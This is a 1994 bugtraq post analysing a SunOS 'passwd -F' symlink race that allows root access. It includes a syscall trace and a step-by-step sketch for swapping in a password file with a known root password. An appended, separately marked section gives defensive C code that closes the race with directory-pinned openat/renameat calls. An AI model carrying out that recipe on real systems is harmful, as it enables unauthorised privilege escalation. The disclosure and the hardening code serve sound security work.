[531] in bugtraq
Re: Sun Patch Id #102060-01
daemon@ATHENA.MIT.EDU (der Mouse)
Mon Dec 19 06:26:03 1994
Date: Mon, 19 Dec 1994 04:30:38 -0500
From: der Mouse <mouse@Collatz.McRCIM.McGill.EDU>
To: bugtraq@fc.net
> So does anybody know more about this one??? I've tried a few things,
> but haven't figured it out yet. [...]
> Problem Description:
> 1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
> race condition.
> This patch restricts the use of the passwd command's -F option [...]
I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep
and ran "passwd -F /tmp/gleep" under the control of trc. Here's the
trace, edited to emphasize the relevant excerpts:
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
[this is the first time /tmp/gleep appears in the trace]
fstat (3, 0xf7fff704) = 0
read (3, 0xc708, 8192) = 448: [the passwd file]
close (3) = 0
gethostname (0x9ae0, 64) = 0: [our hostname]
ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
[I don't know how this may interact with shadow passwords.]
open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
[catch SIGINT]
[frob tty settings]
[read new password]
[do it all over again, for second copy of new password]
[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
umask (0000) = 0022
open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
[experimentation indicates the directory portion is taken from
/tmp/gleep's directory portion]
getdtablesize () = 64
setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
fstat (4, 0xf7fff7dc) = 0
read (4, 0xcb98, 8192) = 448: [the passwd file]
fstat (3, 0xf7fff058) = 0
read (4, 0xcb98, 8192) = 0:
close (4) = 0
write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
close (3) = 0
rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0
Thus, my idea of how one can exploit this [note: this is not an
exploit script!] would be:
% mkdir bar
% cp /etc/passwd bar
[edit bar/passwd to have a known root password]
% ln -s /etc foo
% passwd -F $cwd/foo/passwd
Now, you need to relink foo to point to bar, somewhere between the open
of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it
back before the rename() occurs. If the passwd file is large, hitting
the second window may not be hard.
der Mouse
mouse@collatz.mcrcim.mcgill.edu
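As an added example, not part of der Mouse's post or of Sun's passwd source: the trace above performs three separate path lookups, the create of ptmp in the directory taken from the -F argument, the re-open of the target, and the final rename(), and each one re-resolves any symlink in the path afresh, which is exactly the window the post describes. The C below (hypothetical helper names safe_replace and run_demo, constructed sample lines, a scratch directory under /tmp) pins the directory once with open(O_DIRECTORY|O_NOFOLLOW) and does every later step with openat/fstatat/renameat relative to that descriptor, so a symlink swapped mid-operation has nothing left to redirect; a directory component that is itself a symlink is refused outright. Sun's patch took the other route the quoted description mentions, restricting who may use -F at all; the two measures are complementary.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Rewrite `path` atomically. The directory is opened ONCE; creating the temp
 * file, inspecting the old file and the rename are all done relative to that
 * descriptor, so relinking a symlink in the path afterwards cannot redirect
 * them. Returns 0 on success, -1 with errno set on failure. */
int safe_replace(const char *path, const char *data, size_t len)
{
    char *dcopy = strdup(path), *bcopy = strdup(path); /* dirname/basename may modify */
    const char *dir, *base;
    int rc = -1, dfd = -1, tfd = -1, saved;
    struct stat dst, tst;
    mode_t mode = 0644;
    size_t done = 0;

    if (!dcopy || !bcopy) goto out;
    dir = dirname(dcopy);
    base = basename(bcopy);
    /* O_NOFOLLOW refuses a directory that is itself a symlink (the post's
     * "foo -> /etc"); O_DIRECTORY refuses any non-directory. Success pins the
     * real directory inode for everything that follows. */
    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0 || fstat(dfd, &dst) < 0) goto out;
    /* A privileged writer also refuses a world-writable, non-sticky directory. */
    if ((dst.st_mode & S_IWOTH) && !(dst.st_mode & S_ISVTX)) { errno = EPERM; goto out; }
    /* Only replace a regular file (a symlinked final component is rejected,
     * not followed) and keep its permission bits on the new copy. */
    if (fstatat(dfd, base, &tst, AT_SYMLINK_NOFOLLOW) == 0) {
        if (!S_ISREG(tst.st_mode)) { errno = EINVAL; goto out; }
        mode = tst.st_mode & 07777;
    } else if (errno != ENOENT) goto out;
    /* Same temp name as the trace, but created relative to the pinned
     * directory; O_EXCL makes a pre-existing "ptmp" an error, not a trap. */
    tfd = openat(dfd, "ptmp", O_WRONLY | O_CREAT | O_EXCL, mode);
    if (tfd < 0) goto out;
    while (done < len) {
        ssize_t n = write(tfd, data + done, len - done);
        if (n < 0) { if (errno == EINTR) continue; goto unlink_out; }
        done += (size_t)n;
    }
    if (fsync(tfd) < 0) goto unlink_out;
    if (close(tfd) < 0) { tfd = -1; goto unlink_out; }
    tfd = -1;
    if (renameat(dfd, "ptmp", dfd, base) < 0) goto unlink_out; /* atomic swap */
    rc = 0;
    goto out;
unlink_out:
    saved = errno; unlinkat(dfd, "ptmp", 0); errno = saved;
out:
    saved = errno;
    if (tfd >= 0) close(tfd);
    if (dfd >= 0) close(dfd);
    free(dcopy); free(bcopy);
    errno = saved;
    return rc;
}

/* Read a small file into buf (NUL-terminated); returns its length or -1. */
static ssize_t read_back(const char *path, char *buf, size_t size)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, size - 1);
    if (fd >= 0) close(fd);
    if (n >= 0) buf[n] = '\0';
    return n;
}

/* Self-contained check on a scratch directory with a constructed two-line file
 * (not a real passwd file). Returns 0 when every step behaves as intended,
 * otherwise the number of the failed step. */
int run_demo(void)
{
    char tmpl[] = "/tmp/ptmp-demo-XXXXXX", bar[96], foo[96], real[128], linked[128], buf[256];
    const char *before = "root:x:0:0::/:/bin/sh\nmouse:x:1000:100::/home/mouse:/bin/sh\n";
    const char *after  = "root:x:0:0::/:/bin/sh\nmouse:NEWHASH:1000:100::/home/mouse:/bin/sh\n";
    char *root = mkdtemp(tmpl);
    if (!root) return 1;
    snprintf(bar, sizeof bar, "%s/bar", root);
    snprintf(foo, sizeof foo, "%s/foo", root);
    snprintf(real, sizeof real, "%s/passwd", bar);
    snprintf(linked, sizeof linked, "%s/passwd", foo);
    if (mkdir(bar, 0700) < 0 || symlink(bar, foo) < 0) return 2; /* foo -> bar, as in the post */
    if (safe_replace(real, before, strlen(before)) != 0) return 3;
    /* Through the symlinked directory the write is refused and nothing changes. */
    if (safe_replace(linked, after, strlen(after)) == 0) return 4;
    if (read_back(real, buf, sizeof buf) < 0 || strcmp(buf, before) != 0) return 5;
    /* Through the real directory it succeeds and leaves no temp file behind. */
    if (safe_replace(real, after, strlen(after)) != 0) return 6;
    if (read_back(real, buf, sizeof buf) < 0 || strcmp(buf, after) != 0) return 7;
    snprintf(buf, sizeof buf, "%s/ptmp", bar);
    if (access(buf, F_OK) == 0) return 8;
    unlink(real); unlink(foo); rmdir(bar); rmdir(root);
    return 0;
}

int main(void) { int r = run_demo(); if (r) printf("step %d failed\n", r); else puts("all checks passed"); return r; }
```

run_demo() returns 0 when the symlinked path is refused, the real path is rewritten, and no ptmp is left behind. Refusing a symlinked directory component is stricter than a general-purpose tool needs to be, but for a setuid program writing to a user-chosen path it is the right default: the checks that matter (directory identity, file type, exclusive create) are all made on descriptors that the caller cannot retarget.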